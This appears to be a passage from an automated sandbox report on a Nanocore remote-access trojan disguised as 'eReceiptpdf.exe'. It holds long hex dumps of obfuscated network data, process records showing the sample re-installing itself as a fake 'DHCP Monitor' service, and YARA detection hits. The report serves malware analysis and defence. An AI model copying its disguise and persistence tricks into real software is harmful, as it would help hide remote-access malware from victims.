                2021-10-27 01:03:26 UTC1686INData Raw: 20 4f 20 68 20 68 20 68 20 6a 71 20 63 65 20 71 63 77 20 6a 77 20 6a 65 20 4f 20 68 20 68 20 68 20 6a 71 20 63 65 20 71 63 77 20 6a 77 20 6a 71 20 4f 20 6a 71 20 49 77 20 71 63 77 20 6a 77 20 6a 65 20 70 20 68 20 68 20 68 20 6a 71 20 63 49 20 71 63 77 20 6a 77 20 6a 65 20 70 20 68 20 68 20 68 20 6a 71 20 63 77 20 71 63 77 20 6a 77 20 6a 68 20 6a 71 20 71 68 68 20 71 63 77 20 6a 77 20 6a 65 20 77 20 68 20 68 20 68 20 6a 71 20 63 65 20 71 63 77 20 6a 77 20 6a 65 20 77 20 68 20 68 20 68 20 6a 71 20 71 68 68 20 71 63 77 20 6a 77 20 65 4f 20 6a 71 20 4f 77 20 71 63 77 20 6a 77 20 6a 65 20 49 20 68 20 68 20 68 20 6a 71 20 78 70 20 71 63 77 20 6a 77 20 6a 65 20 49 20 68 20 68 20 68 20 6a 71 20 63 49 20 71 63 77 20 6a 77 20 65 70 20 6a 71 20 71 68 71 20 71 63 77
                Data Ascii: O h h h jq ce qcw jw je O h h h jq ce qcw jw jq O jq Iw qcw jw je p h h h jq cI qcw jw je p h h h jq cw qcw jw jh jq qhh qcw jw je w h h h jq ce qcw jw je w h h h jq qhh qcw jw eO jq Ow qcw jw je I h h h jq xp qcw jw je I h h h jq cI qcw jw ep jq qhq qcw
                2021-10-27 01:03:26 UTC1702INData Raw: 63 20 4f 20 65 78 65 20 71 71 20 71 78 20 68 20 6a 6a 20 65 20 71 68 78 20 71 68 20 71 78 20 68 20 71 63 77 20 77 20 71 68 78 20 71 68 20 71 68 20 68 20 70 20 78 20 65 78 65 20 71 71 20 71 68 20 68 20 65 20 6a 20 63 70 20 77 20 71 68 20 68 20 78 70 20 71 68 20 65 71 20 77 20 71 78 20 68 20 65 65 4f 20 77 20 65 71 78 20 49 20 71 68 20 68 20 71 70 49 20 49 20 65 71 20 77 20 71 68 20 68 20 63 68 20 4f 20 71 49 68 20 49 20 71 68 20 68 20 65 68 4f 20 6a 20 71 49 68 20 49 20 71 68 20 68 20 71 65 70 20 65 20 65 71 20 77 20 71 68 20 68 20 71 63 49 20 71 71 20 65 71 20 77 20 71 68 20 68 20 6a 77 20 4f 20 65 71 20 77 20 71 68 20 68 20 71 71 77 20 65 20 65 71 20 77 20 71 68 20 68 20 65 70 20 4f 20 71 68 78 20 71 68 20 71 70 20 68 20 6a 4f 20 68 20 71 70 71 20 77 20
                Data Ascii: c O exe qq qx h jj e qhx qh qx h qcw w qhx qh qh h p x exe qq qh h e j cp w qh h xp qh eq w qx h eeO w eqx I qh h qpI I eq w qh h ch O qIh I qh h ehO j qIh I qh h qep e eq w qh h qcI qq eq w qh h jw O eq w qh h qqw e eq w qh h ep O qhx qh qp h jO h qpq w
                2021-10-27 01:03:26 UTC1718INData Raw: 68 20 71 65 65 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 71 78 49 20 71 65 6a 20 65 77 20 71 20 78 63 20 68 20 71 68 78 20 71 65 6a 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 63 68 20 71 68 49 20 65 77 20 71 20 78 63 20 68 20 65 78 70 20 71 65 78 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 71 65 65 20 6a 77 20 65 77 20 71 20 78 63 20 68 20 68 20 71 65 77 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 71 78 68 20 71 6a 70 20 65 77 20 71 20 78 63 20 68 20 71 49 70 20 71 65 70 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 77 70 20 77 49 20 65 77 20 71 20 78 63 20 68 20 71 63 65 20 71 6a 68 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 71 63 65 20 70 65 20 65 77 20 71 20 78 63 20 68 20 70 70 20 71 6a 65 20 6a 20 68 20 68 20 68 20 65 65 20 68 20 78 65 20 71 65 77 20 65 77 20
                Data Ascii: h qee j h h h ee h qxI qej ew q xc h qhx qej j h h h ee h ch qhI ew q xc h exp qex j h h h ee h qee jw ew q xc h h qew j h h h ee h qxh qjp ew q xc h qIp qep j h h h ee h wp wI ew q xc h qce qjh j h h h ee h qce pe ew q xc h pp qje j h h h ee h xe qew ew
                2021-10-27 01:03:26 UTC1734INData Raw: 68 20 70 20 68 20 70 68 20 71 68 20 78 65 20 71 68 20 70 20 68 20 70 78 20 71 68 20 78 77 20 71 68 20 70 20 68 20 70 70 20 71 68 20 49 65 20 71 68 20 70 20 68 20 4f 65 20 71 68 20 77 77 20 71 68 20 70 20 68 20 4f 49 20 71 68 20 70 65 20 71 68 20 78 71 20 68 20 63 71 20 68 20 65 68 71 20 71 65 20 49 78 20 68 20 65 77 20 68 20 65 65 77 20 71 20 49 78 20 68 20 71 4f 20 68 20 71 4f 65 20 71 65 20 49 77 20 68 20 71 71 20 68 20 71 49 71 20 71 65 20 49 77 20 68 20 71 4f 20 68 20 71 4f 65 20 71 65 20 77 6a 20 68 20 63 71 20 68 20 65 71 70 20 71 65 20 4f 4f 20 68 20 71 71 20 68 20 71 49 71 20 71 65 20 4f 4f 20 68 20 71 4f 20 68 20 71 4f 65 20 71 65 20 71 68 63 20 68 20 63 71 20 68 20 65 6a 70 20 71 65 20 71 65 70 20 68 20 65 77 20 68 20 65 65 77 20 71 20 71 6a 71
                Data Ascii: h p h ph qh xe qh p h px qh xw qh p h pp qh Ie qh p h Oe qh ww qh p h OI qh pe qh xq h cq h ehq qe Ix h ew h eew q Ix h qO h qOe qe Iw h qq h qIq qe Iw h qO h qOe qe wj h cq h eqp qe OO h qq h qIq qe OO h qO h qOe qe qhc h cq h ejp qe qep h ew h eew q qjq
                2021-10-27 01:03:26 UTC1750INData Raw: 20 68 20 70 6a 20 71 68 71 20 71 71 49 20 77 63 20 71 68 71 20 71 71 78 20 71 71 68 20 71 68 71 20 71 68 70 20 77 4f 20 4f 70 20 71 68 49 20 71 68 71 20 4f 4f 20 71 71 49 20 70 6a 20 71 68 71 20 4f 4f 20 71 71 77 20 71 71 78 20 71 68 63 20 71 71 49 20 71 65 71 20 68 20 77 6a 20 49 4f 20 71 71 68 20 71 71 49 20 71 68 63 20 71 71 49 20 71 65 71 20 68 20 49 4f 20 71 68 4f 20 71 71 65 20 71 71 49 20 71 65 71 20 68 20 65 6a 49 20 71 6a 71 20 71 63 77 20 65 6a 49 20 71 6a 68 20 71 70 70 20 65 6a 49 20 71 6a 71 20 71 49 78 20 65 6a 49 20 71 6a 71 20 71 49 6a 20 65 6a 49 20 71 6a 71 20 71 70 65 20 65 6a 49 20 71 6a 71 20 71 65 70 20 65 6a 49 20 71 6a 71 20 71 65 4f 20 65 6a 49 20 71 6a 71 20 71 77 65 20 65 6a 49 20 71 6a 71 20 71 70 77 20 65 6a 49 20 71 6a 71 20
                Data Ascii: h pj qhq qqI wc qhq qqx qqh qhq qhp wO Op qhI qhq OO qqI pj qhq OO qqw qqx qhc qqI qeq h wj IO qqh qqI qhc qqI qeq h IO qhO qqe qqI qeq h ejI qjq qcw ejI qjh qpp ejI qjq qIx ejI qjq qIj ejI qjq qpe ejI qjq qep ejI qjq qeO ejI qjq qwe ejI qjq qpw ejI qjq
                2021-10-27 01:03:26 UTC1766INData Raw: 70 78 20 65 65 71 20 71 49 78 20 65 65 65 20 71 6a 63 20 68 20 65 6a 65 20 71 6a 63 20 71 78 78 20 65 6a 65 20 71 6a 78 20 71 70 78 20 65 6a 65 20 71 6a 78 20 71 6a 70 20 65 6a 65 20 71 6a 78 20 71 6a 4f 20 65 6a 65 20 71 6a 78 20 71 70 49 20 65 6a 65 20 71 6a 78 20 71 6a 63 20 65 6a 65 20 71 6a 78 20 71 70 63 20 65 6a 65 20 71 6a 78 20 71 78 71 20 65 6a 65 20 71 6a 78 20 71 63 70 20 65 6a 65 20 71 6a 78 20 71 70 70 20 65 6a 65 20 71 6a 78 20 71 6a 49 20 65 6a 65 20 71 6a 78 20 71 70 77 20 65 6a 65 20 71 6a 78 20 71 78 6a 20 65 6a 65 20 71 6a 78 20 71 6a 4f 20 65 6a 65 20 71 6a 63 20 71 6a 49 20 68 20 65 65 4f 20 71 78 78 20 71 49 63 20 65 65 4f 20 71 78 78 20 71 6a 77 20 65 65 4f 20 71 78 78 20 71 78 49 20 65 65 4f 20 71 78 78 20 71 70 65 20 65 65 4f 20
                Data Ascii: px eeq qIx eee qjc h eje qjc qxx eje qjx qpx eje qjx qjp eje qjx qjO eje qjx qpI eje qjx qjc eje qjx qpc eje qjx qxq eje qjx qcp eje qjx qpp eje qjx qjI eje qjx qpw eje qjx qxj eje qjx qjO eje qjc qjI h eeO qxx qIc eeO qxx qjw eeO qxx qxI eeO qxx qpe eeO
                2021-10-27 01:03:26 UTC1782INData Raw: 20 71 63 70 20 65 6a 65 20 71 78 49 20 71 49 6a 20 65 6a 65 20 71 78 49 20 71 78 6a 20 65 6a 65 20 71 78 49 20 71 63 77 20 65 6a 65 20 71 78 49 20 71 63 77 20 65 6a 65 20 71 78 49 20 71 6a 78 20 65 6a 65 20 71 78 49 20 71 78 65 20 68 20 65 6a 71 20 71 78 77 20 71 78 63 20 65 6a 71 20 71 78 49 20 71 6a 4f 20 65 6a 71 20 71 78 49 20 71 78 68 20 65 6a 71 20 71 78 49 20 71 63 63 20 65 6a 71 20 71 78 49 20 71 4f 71 20 65 6a 71 20 71 78 49 20 71 70 63 20 65 6a 71 20 71 78 49 20 71 78 78 20 65 6a 71 20 71 78 49 20 71 77 6a 20 65 6a 71 20 71 78 49 20 71 78 63 20 65 6a 71 20 71 78 49 20 71 6a 4f 20 65 6a 71 20 71 78 49 20 71 70 77 20 65 6a 71 20 71 78 49 20 71 70 70 20 65 6a 71 20 71 78 49 20 71 77 71 20 65 6a 71 20 71 78 49 20 71 6a 77 20 65 6a 71 20 71 78 77 20
                Data Ascii: qcp eje qxI qIj eje qxI qxj eje qxI qcw eje qxI qcw eje qxI qjx eje qxI qxe h ejq qxw qxc ejq qxI qjO ejq qxI qxh ejq qxI qcc ejq qxI qOq ejq qxI qpc ejq qxI qxx ejq qxI qwj ejq qxI qxc ejq qxI qjO ejq qxI qpw ejq qxI qpp ejq qxI qwq ejq qxI qjw ejq qxw
                2021-10-27 01:03:26 UTC1798INData Raw: 20 71 70 65 20 65 65 63 20 71 6a 6a 20 71 6a 65 20 65 65 63 20 71 6a 6a 20 71 6a 70 20 65 65 63 20 71 6a 6a 20 71 6a 49 20 65 65 63 20 71 6a 6a 20 71 70 4f 20 65 65 63 20 71 6a 6a 20 71 70 6a 20 65 65 63 20 71 6a 6a 20 71 6a 70 20 65 65 63 20 71 6a 6a 20 71 63 78 20 65 65 63 20 71 6a 6a 20 71 6a 49 20 65 65 63 20 71 6a 6a 20 71 6a 65 20 65 65 63 20 71 6a 6a 20 71 6a 6a 20 65 65 63 20 71 6a 6a 20 71 78 4f 20 68 20 65 65 4f 20 71 6a 77 20 71 70 6a 20 65 65 4f 20 71 6a 77 20 71 49 49 20 65 65 4f 20 71 6a 70 20 71 78 4f 20 65 65 4f 20 71 6a 70 20 71 78 4f 20 65 65 4f 20 71 6a 77 20 71 49 65 20 65 65 4f 20 71 6a 77 20 71 70 77 20 65 65 4f 20 71 6a 70 20 71 49 4f 20 65 65 4f 20 71 6a 77 20 71 49 77 20 65 65 4f 20 71 6a 77 20 71 49 63 20 65 65 4f 20 71 6a 77 20
                Data Ascii: qpe eec qjj qje eec qjj qjp eec qjj qjI eec qjj qpO eec qjj qpj eec qjj qjp eec qjj qcx eec qjj qjI eec qjj qje eec qjj qjj eec qjj qxO h eeO qjw qpj eeO qjw qII eeO qjp qxO eeO qjp qxO eeO qjw qIe eeO qjw qpw eeO qjp qIO eeO qjw qIw eeO qjw qIc eeO qjw
                2021-10-27 01:03:26 UTC1814INData Raw: 20 71 70 68 20 65 6a 77 20 71 63 63 20 71 63 63 20 65 6a 77 20 71 63 63 20 71 63 70 20 65 6a 77 20 71 63 49 20 71 78 68 20 65 6a 77 20 71 63 49 20 71 6a 77 20 65 6a 77 20 71 63 49 20 71 63 65 20 65 6a 77 20 71 63 63 20 71 63 49 20 65 6a 77 20 71 63 49 20 71 6a 70 20 65 6a 77 20 71 63 63 20 71 49 71 20 65 6a 77 20 71 63 63 20 71 63 4f 20 65 6a 77 20 71 63 49 20 71 6a 4f 20 65 6a 77 20 71 63 63 20 71 63 49 20 68 20 65 6a 6a 20 71 49 65 20 71 49 71 20 65 6a 6a 20 71 49 71 20 71 49 70 20 65 6a 6a 20 71 49 65 20 71 63 65 20 65 6a 6a 20 71 49 65 20 71 63 6a 20 65 6a 6a 20 71 49 71 20 71 49 4f 20 65 6a 6a 20 71 49 71 20 71 77 71 20 65 6a 6a 20 71 49 65 20 71 63 49 20 65 6a 6a 20 71 49 71 20 71 49 49 20 65 6a 6a 20 71 49 65 20 71 63 6a 20 65 6a 6a 20 71 49 71 20
                Data Ascii: qph ejw qcc qcc ejw qcc qcp ejw qcI qxh ejw qcI qjw ejw qcI qce ejw qcc qcI ejw qcI qjp ejw qcc qIq ejw qcc qcO ejw qcI qjO ejw qcc qcI h ejj qIe qIq ejj qIq qIp ejj qIe qce ejj qIe qcj ejj qIq qIO ejj qIq qwq ejj qIe qcI ejj qIq qII ejj qIe qcj ejj qIq
                2021-10-27 01:03:26 UTC1830INData Raw: 20 65 6a 65 20 71 77 49 20 71 49 6a 20 68 20 65 65 49 20 71 77 4f 20 71 78 71 20 65 65 49 20 71 77 4f 20 71 78 71 20 65 65 49 20 71 77 70 20 71 70 71 20 65 65 49 20 71 77 70 20 71 49 68 20 65 65 49 20 71 77 70 20 71 49 71 20 65 65 49 20 71 77 70 20 71 70 63 20 65 65 49 20 71 77 4f 20 71 78 78 20 65 65 49 20 71 77 4f 20 71 49 78 20 65 65 49 20 71 77 4f 20 71 78 6a 20 65 65 49 20 71 77 70 20 71 49 68 20 65 65 49 20 71 77 70 20 71 63 49 20 65 65 49 20 71 77 70 20 71 49 68 20 65 65 49 20 71 77 4f 20 71 63 4f 20 65 65 49 20 71 77 70 20 71 63 49 20 65 65 49 20 71 77 70 20 71 49 6a 20 68 20 65 65 49 20 71 70 6a 20 71 49 68 20 65 65 49 20 71 70 65 20 71 70 68 20 65 65 49 20 71 70 65 20 71 77 77 20 65 65 49 20 71 70 65 20 71 77 4f 20 65 65 49 20 71 70 6a 20 71 78
                Data Ascii: eje qwI qIj h eeI qwO qxq eeI qwO qxq eeI qwp qpq eeI qwp qIh eeI qwp qIq eeI qwp qpc eeI qwO qxx eeI qwO qIx eeI qwO qxj eeI qwp qIh eeI qwp qcI eeI qwp qIh eeI qwO qcO eeI qwp qcI eeI qwp qIj h eeI qpj qIh eeI qpe qph eeI qpe qww eeI qpe qwO eeI qpj qx
                2021-10-27 01:03:26 UTC1846INData Raw: 65 63 20 71 70 49 20 71 77 65 20 65 65 63 20 71 70 49 20 71 70 65 20 65 65 63 20 71 70 49 20 71 6a 77 20 65 65 63 20 71 70 77 20 71 6a 78 20 65 65 63 20 71 70 49 20 71 70 71 20 65 65 63 20 71 70 49 20 71 77 4f 20 65 65 63 20 71 70 49 20 71 6a 6a 20 65 65 63 20 71 70 49 20 71 70 71 20 65 65 63 20 71 70 49 20 71 6a 65 20 65 65 63 20 71 70 49 20 71 6a 6a 20 65 65 63 20 71 70 49 20 71 77 71 20 68 20 65 6a 70 20 71 4f 71 20 71 77 63 20 65 6a 70 20 71 4f 71 20 71 63 49 20 65 6a 70 20 71 4f 68 20 71 77 6a 20 65 6a 70 20 71 4f 68 20 71 77 4f 20 65 6a 70 20 71 4f 71 20 71 78 63 20 65 6a 70 20 71 4f 71 20 71 63 4f 20 65 6a 70 20 71 4f 68 20 71 77 70 20 65 6a 70 20 71 4f 68 20 71 77 6a 20 65 6a 70 20 71 4f 71 20 71 63 63 20 65 6a 70 20 71 4f 71 20 71 63 70 20 65 6a
                Data Ascii: ec qpI qwe eec qpI qpe eec qpI qjw eec qpw qjx eec qpI qpq eec qpI qwO eec qpI qjj eec qpI qpq eec qpI qje eec qpI qjj eec qpI qwq h ejp qOq qwc ejp qOq qcI ejp qOh qwj ejp qOh qwO ejp qOq qxc ejp qOq qcO ejp qOh qwp ejp qOh qwj ejp qOq qcc ejp qOq qcp ej
                2021-10-27 01:03:26 UTC1862INData Raw: 20 71 77 6a 20 71 78 71 20 65 65 70 20 71 77 6a 20 71 6a 71 20 65 65 70 20 71 77 65 20 71 70 68 20 65 65 70 20 71 77 6a 20 71 49 78 20 65 65 70 20 71 77 65 20 71 70 78 20 65 65 70 20 71 77 6a 20 71 49 49 20 65 65 70 20 71 77 65 20 71 70 49 20 65 65 70 20 71 77 65 20 71 77 77 20 65 65 70 20 71 77 65 20 71 70 6a 20 65 65 70 20 71 77 65 20 71 70 6a 20 65 65 70 20 71 77 65 20 71 77 70 20 68 20 65 6a 4f 20 71 77 65 20 71 6a 77 20 65 6a 4f 20 71 77 65 20 71 70 71 20 65 6a 4f 20 71 77 65 20 71 77 77 20 65 6a 4f 20 71 77 65 20 71 78 4f 20 65 6a 4f 20 71 77 65 20 71 49 78 20 65 6a 4f 20 71 77 65 20 71 70 70 20 65 6a 4f 20 71 77 65 20 71 77 77 20 65 6a 4f 20 71 77 65 20 71 6a 68 20 65 6a 4f 20 71 77 65 20 71 6a 78 20 65 6a 4f 20 71 77 65 20 71 63 78 20 65 6a 4f 20
                Data Ascii: qwj qxq eep qwj qjq eep qwe qph eep qwj qIx eep qwe qpx eep qwj qII eep qwe qpI eep qwe qww eep qwe qpj eep qwe qpj eep qwe qwp h ejO qwe qjw ejO qwe qpq ejO qwe qww ejO qwe qxO ejO qwe qIx ejO qwe qpp ejO qwe qww ejO qwe qjh ejO qwe qjx ejO qwe qcx ejO
                2021-10-27 01:03:26 UTC1878INData Raw: 78 4f 20 65 71 71 20 71 49 68 20 65 71 71 20 71 78 77 20 65 71 68 20 71 49 4f 20 65 71 68 20 71 4f 68 20 65 71 71 20 71 49 70 20 65 71 68 20 71 49 6a 20 65 71 71 20 71 78 70 20 65 71 68 20 71 70 63 20 68 20 65 65 70 20 71 78 78 20 71 70 4f 20 65 65 70 20 71 78 78 20 71 70 78 20 65 65 70 20 71 78 63 20 71 63 77 20 65 65 70 20 71 78 78 20 71 70 70 20 65 65 70 20 71 78 78 20 71 70 63 20 65 65 70 20 71 78 78 20 71 70 63 20 65 65 70 20 71 78 63 20 71 63 68 20 65 65 70 20 71 78 78 20 71 70 63 20 65 65 70 20 71 78 63 20 71 63 71 20 65 65 70 20 71 78 78 20 71 70 78 20 65 65 70 20 71 78 63 20 71 49 49 20 65 65 70 20 71 78 78 20 71 70 68 20 65 65 70 20 71 78 78 20 71 70 49 20 65 65 70 20 71 78 63 20 71 49 49 20 65 65 70 20 71 78 78 20 71 70 49 20 68 20 65 6a 63 20
                Data Ascii: xO eqq qIh eqq qxw eqh qIO eqh qOh eqq qIp eqh qIj eqq qxp eqh qpc h eep qxx qpO eep qxx qpx eep qxc qcw eep qxx qpp eep qxx qpc eep qxx qpc eep qxc qch eep qxx qpc eep qxc qcq eep qxx qpx eep qxc qII eep qxx qph eep qxx qpI eep qxc qII eep qxx qpI h ejc
                2021-10-27 01:03:26 UTC1894INData Raw: 20 49 71 20 71 77 20 63 77 20 63 20 68 20 71 20 65 70 20 71 70 20 49 71 20 65 20 49 20 70 20 6a 20 49 20 71 77 20 77 65 20 78 20 68 20 68 20 71 20 68 20 78 20 68 20 68 20 70 20 68 20 78 20 65 63 63 20 71 63 20 71 63 20 68 20 78 20 71 65 70 20 68 20 68 20 68 20 78 20 65 20 68 20 68 20 68 20 78 20 49 78 20 68 20 68 20 68 20 78 20 68 20 78 20 68 20 68 20 78 20 68 20 71 49 20 68 20 68 20 78 20 68 20 65 20 68 20 68 20 78 20 68 20 71 20 68 20 68 20 78 20 68 20 70 20 68 20 68 20 78 20 71 20 68 20 68 20 68 20 78 20 70 20 68 20 68 20 68 20 78 20 71 49 20 68 20 68 20 68 20 78 20 6a 65 20 68 20 68 20 68 20 78 20 68 20 68 20 65 20 68 20 78 20 68 20 68 20 71 63 20 68 20 78 20 68 20 68 20 78 20 68 20 65 20 49 20 4f 20 6a 20 49 20 71 77 20 77 49 20 78 20 68 20 68 20 68
                Data Ascii: Iq qw cw c h q ep qp Iq e I p j I qw we x h h q h x h h p h x ecc qc qc h x qep h h h x e h h h x Ix h h h x h x h h x h qI h h x h e h h x h q h h x h p h h x q h h h x p h h h x qI h h h x je h h h x h h e h x h h qc h x h h x h e I O j I qw wI x h h h


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:03:03:03
                Start date:27/10/2021
                Path:C:\Users\user\Desktop\eReceiptpdf.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\eReceiptpdf.exe'
                Imagebase:0xdc0000
                File size:182200 bytes
                MD5 hash:C97F7F2DEA671626AB1C6D3D1AD59422
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                Reputation:low

                General

                Start time:03:03:08
                Start date:27/10/2021
                Path:C:\Users\user\Desktop\eReceiptpdf.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\eReceiptpdf.exe
                Imagebase:0x810000
                File size:182200 bytes
                MD5 hash:C97F7F2DEA671626AB1C6D3D1AD59422
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:low

                General

                Start time:03:03:19
                Start date:27/10/2021
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
                Imagebase:0x120000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Start time:03:03:19
                Start date:27/10/2021
                Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                Imagebase:0xb30000
                File size:182200 bytes
                MD5 hash:C97F7F2DEA671626AB1C6D3D1AD59422
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                Antivirus matches:
                • Detection: 22%, ReversingLabs
                Reputation:low

                General

                Start time:03:03:25
                Start date:27/10/2021
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
                Imagebase:0x120000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:03:03:26
                Start date:27/10/2021
                Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                Wow64 process (32bit):false
                Commandline:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                Imagebase:0x420000
                File size:182200 bytes
                MD5 hash:C97F7F2DEA671626AB1C6D3D1AD59422
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Start time:03:03:27
                Start date:27/10/2021
                Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                Wow64 process (32bit):false
                Commandline:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                Imagebase:0x340000
                File size:182200 bytes
                MD5 hash:C97F7F2DEA671626AB1C6D3D1AD59422
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Start time:03:03:27
                Start date:27/10/2021
                Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                Wow64 process (32bit):true
                Commandline:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                Imagebase:0xd40000
                File size:182200 bytes
                MD5 hash:C97F7F2DEA671626AB1C6D3D1AD59422
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                Reputation:low

                Disassembly

                Code Analysis

                Reset < >